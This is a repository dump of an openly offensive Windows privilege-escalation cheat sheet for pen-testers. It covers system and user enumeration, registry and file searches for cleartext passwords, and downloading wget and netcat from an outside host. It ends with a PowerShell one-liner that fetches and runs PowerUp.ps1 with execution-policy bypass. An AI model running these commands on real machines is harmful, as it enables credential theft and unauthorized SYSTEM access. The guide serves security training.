├── README.md └── index.md /README.md: -------------------------------------------------------------------------------- 1 | # What is this? 2 | a step by step guide to preform Windows related privilege escalation from limited shell into SYSTEM abusing misconfigurations and local exploits. 3 | We call it "WPECS" for short and can be accessed at [AddaxSoft.com/WPECS](https://addaxsoft.com/wpecs) with a dark and easy to read theme. 4 | 5 | 6 | 7 | # Contributions 8 | You can contribute by forking the repository, modify index.md then send a pull request to the master brunch. 9 | Please see "Format" and adhere to them to make life easier for everyone 10 | If you need markdown (.md) help you can read this quick [guide](https://guides.github.com/features/mastering-markdown/) by Github 11 | First place would be to solve [issues](https://github.com/AddaxSoft/OSWindowsPrivEscalation/issues) 12 | 13 | 14 | ## Format and Rules 15 | - We use 4 spaces until I figure out how to turn tabs on (yes, I'm a tab guy) 16 | - 3 lines feeds before each headline H1 17 | - 2 line feeds before each headline H2 18 | - each major section (e.g. OS Enumuration) is a headline H1 19 | - each section (e.g searching passwords in fiels under looting for clear text passwords) is a headline H2 20 | - After each "chunk" of the document we add an html
(break) using 21 | - If we ever use screenshots we try to be as specific as possible, animated gifs are even better. 22 | 23 | 24 | ## Tips 25 | - you can use `[Another section](#new-section)` to reffer to a headline (e.g [this](#Format-and-Rules) will reffer to Format and rules) 26 | 27 | 28 | 29 | # todos 30 | - [x] Set up the initial template 31 | - [x] Find a cooler + catchy name for the project 32 | - [x] Test the template rendering 33 | - [x] Test webserver streaming 34 | - [x] Open contributions 35 | - [x] write the enumuration phase 36 | - [x] add format + contributions sections to the readme.md 37 | - [x] do some testing regarding console alises 38 | - [x] test powershell calls (since we will run them non-interactively) 39 | - [ ] write some scripts for enum 40 | - [x] shadow of gatherNetworkInfo.vbs [info](http://www.verboon.info/2011/06/the-gathernetworkinfo-vbs-script/) 41 | - [ ] add tightVNC portable server [page](https://sourceforge.net/projects/vnc-tight/files/TightVNC-win32/1.3.10/tightvnc-1.3.10_x86.zip/download) 42 | -------------------------------------------------------------------------------- /index.md: -------------------------------------------------------------------------------- 1 | # About this document 2 | This document is an open source markdown document that can be contributed to via github. 3 | If you see a typo, a bug or a mistake, an improvment, or a vector that we've missed please send me a pull request to the master brunch via the 4 | [repo link](https://github.com/AddaxSoft/OSWindowsPrivEscalation) and I will review it and approve if approperiate asap. 5 | 6 | This document is meant for pen-testers, red teams, and the like. 7 | 8 | ** Needless to state: You're responosible for what you're doing :-) 9 | 10 | 11 | 12 | # Notes & Format 13 | - commands should be copiable from the boxes; windows inline command comments are noted as `command &:: comment`, so it still should work without messing your easy copy-paste style commands. Think of it as the hash # in Linux. 14 | - if two commands are required to run it's better to combine them into one line using the `&` delimiter 15 | - if a command is an alternative to another; use the `||` delimiter so when command1 fails the second gets executed. 16 | 17 | 18 | 19 | # Contributors 20 | - AK | Author and Maintainer [amAK.xyz](https://imAK.xyz), [@xxByte](https://twitter.com/xxByte) 21 | 22 | 23 | ------ 24 | 25 | Let's get to it! 26 | 27 | 28 | 29 | # OS Enumurations 30 | In this stage you want to learn as much as possible about the operating system. 31 | Note any odd things and investigate them until you hit a dead-end, then do the next thing. 32 | 33 | 34 | ## Windows Version and Configuration 35 | What Windows is it, what version? 36 | 37 | systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 38 | 39 | What architecture? x86 or x64? 40 | 41 | wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% 42 | 43 | Are you on Windows 7 or hight? Skip the reset of the enumurations and use the default `gatherNetworkInfo.vbs` script 44 | This script does all the OS enum magic! Read more about it [here](https://answers.microsoft.com/en-us/windows/forum/windows_7-security/does-anyone-know-what-gathernetworkinfovbs-is-its/63a302a6-cf69-4b9a-a3ef-4b2aff1b2514) run this one liner to generate the config folder that contains all the txt files, which have very juicy info. 45 | To understand better what is being generated, look into the source of the script `c:\windows\system32\gatherNetworkInfo.vbs` 46 | 47 | Note: some txt files will contain errors as you're not admin (yet). 48 | 49 | cd %TEMP% & cscript c:\windows\system32\gatherNetworkInfo.vbs & cd config & dir 50 | 51 | List all env variables 52 | 53 | set 54 | 55 | List all drives 56 | 57 | wmic logicaldisk get caption || fsutil fsinfo drives 58 | 59 | 60 | ## Users Enumuration 61 | Get current username 62 | 63 | echo %USERNAME% || whoami 64 | 65 | List all users 66 | 67 | net user 68 | whoami /all 69 | 70 | List logon requirments; useable for bruteforcing 71 | 72 | net accounts 73 | 74 | Get details about a user (i.e. administrator, admin, current user) 75 | 76 | net user administrator 77 | net user admin 78 | net user %USERNAME% 79 | 80 | List all local groups 81 | 82 | net localgroup 83 | 84 | Get details about a group (i.e. administrators) 85 | 86 | net localgroup administrators 87 | 88 | 89 | ## Network Enumuration 90 | You will want to know how this host is connected; what kind of protocls and services are running, and finally maybe even tap into one of the interfaces and learn what's going on 91 | 92 | 93 | List all network interfaces 94 | 95 | ipconfig /all 96 | 97 | List current routing table 98 | 99 | route print 100 | 101 | List the ARP table 102 | 103 | arp -A 104 | 105 | List all current connections 106 | 107 | netstat -ano 108 | 109 | List firware state and current configuration 110 | 111 | netsh advfirewall firewall dump 112 | 113 | List all network shares 114 | 115 | net share 116 | 117 | 118 | 119 | # Looting any clear text passwords 120 | Many admins will store clear-text passwords on the file system. Your target is usually xml, txt, xls files that have the word pass/password on them. 121 | 122 | 123 | ## Searching in files 124 | Quick peek into common password files 125 | 126 | note: If you found encrypted contents; decrypt them with gpprefdecrypt.py 127 | encoded passwords are decoded using base64 128 | 129 | TYPE c:\sysprep.inf 130 | TYPE c:\sysprep\sysprep.xml 131 | TYPE %WINDIR%\Panther\Unattend\Unattended.xml 132 | TYPE %WINDIR%\Panther\Unattended.xml 133 | 134 | Search for file contents 135 | 136 | cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt 137 | 138 | Search for a file with a certain filename 139 | 140 | dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* 141 | 142 | 143 | ## Searching in Registery 144 | Search the registery for key names 145 | 146 | REG QUERY HKLM /F "password" /t REG_SZ /S /K 147 | REG QUERY HKCU /F "password" /t REG_SZ /S /K 148 | 149 | Search the registery for any clear text passwords in key values 150 | 151 | note: value of each key will be printed out too 152 | 153 | REG QUERY HKLM /F "password" /t REG_SZ /S 154 | REG QUERY HKCU /F "password" /t REG_SZ /S 155 | 156 | Read a vlue of a certain sub key 157 | 158 | REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList 159 | 160 | 161 | ## Processes Enum 162 | What processes are running? 163 | 164 | tasklist /v 165 | 166 | Which processes are running as "system" 167 | 168 | tasklist /v /fi "username eq system" 169 | 170 | Do you have powershell magic? 171 | 172 | REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion 173 | 174 | 175 | # Tools and Binaries 176 | In this section you will have the basic binaries to make your life a bit easier such as zip, unzip, wget, and the rest. 177 | These tools are meant to be used for local exploits or get other privilege-escalation scripts to do deeper scanning for you. 178 | 179 | 180 | ## (De)compressing files 181 | Download the unzip binary for windows from [here](http://gnuwin32.sourceforge.net/packages/unzip.htm) 182 | Unzip it in your attacker host then serve /bin/unzip.exe via an http server to your target host 183 | 184 | unzip.exe -h &::#usage 185 | unzip.exe file.zip &::#extract 186 | 187 | 188 | For compression (or zip) follow the same steps as above, the only difference is the binaries, you can get them [here](http://gnuwin32.sourceforge.net/packages/zip.htm) 189 | zip has also a dependency file called bzip2.dll, which has to be in the same folder and can also be downloaded from the same link ^ 190 | Once you have the binary and dependency dll on you can run: 191 | 192 | zip -h &::#for usage 193 | zip -9 out.zip file.txt file.jpg file.xls &::#encrypt files 194 | zip -9 out.zip -r c:\some\directory\ &::#encrypt directory 195 | zip -e -P PASSWORD_HERE -9 out.zip file1.txt file2.xls file3.jpg &::#for encryption with a password 196 | zip -e -P PASSWORD_HERE -9 -r c:\some\directory &::#same as above but for directories. 197 | 198 | 199 | ## Uploading / Downloading files 200 | a wget using powershell 201 | 202 | powershell -Noninteractive -NoProfile -command "wget https://addaxsoft.com/download/wpecs/wget.exe -UseBasicParsing -OutFile %TEMP%\wget.exe" 203 | 204 | wget using bitsadmin (when powershell is not present) 205 | 206 | cmd /c "bitsadmin /transfer myjob /download /priority high https://addaxsoft.com/download/wpecs/wget.exe %TEMP%\wget.exe" 207 | 208 | now you have wget.exe that can be executed from %TEMP%wget 209 | for example I will use it here to download netcat 210 | 211 | %TEMP%\wget https://addaxsoft.com/download/wpecs/nc.exe 212 | 213 | 214 | 215 | # Abusing Weak Services 216 | this is the section where "shit gets real" 217 | If you have no powershell skip the first part of this section and go to the manual way 218 | if you do, you're in a bit of luck to automate this using PowerSploit > PrivEsc > PowerUp 219 | 220 | ## Spot the weak service using PowerSploit's PowerUP 221 | Usage and details of this script can be found [here](https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc) 222 | 223 | powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks 224 | 225 | 226 | 227 | ----- 228 | 229 | # Special Thanks & Original Inspirations 230 | - This document wouldn't be here if I didn't get some inspirations: 231 | - fuzzysecurity's ultimate guide for Windows Privilge escalation, which can be found under this [link](http://www.fuzzysecurity.com/tutorials/16.html). 232 | - g0tmi1k's Basic Linux Privilege Escalation which can be found under this [link](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) 233 | - Peter Kim's Hackers Playbook 2 - Zero to Hero section [link](http://thehackerplaybook.com/dashboard/) 234 | - Offensive Security, which pushed me really hard beyod my limitations during the many hours of training. 235 | --------------------------------------------------------------------------------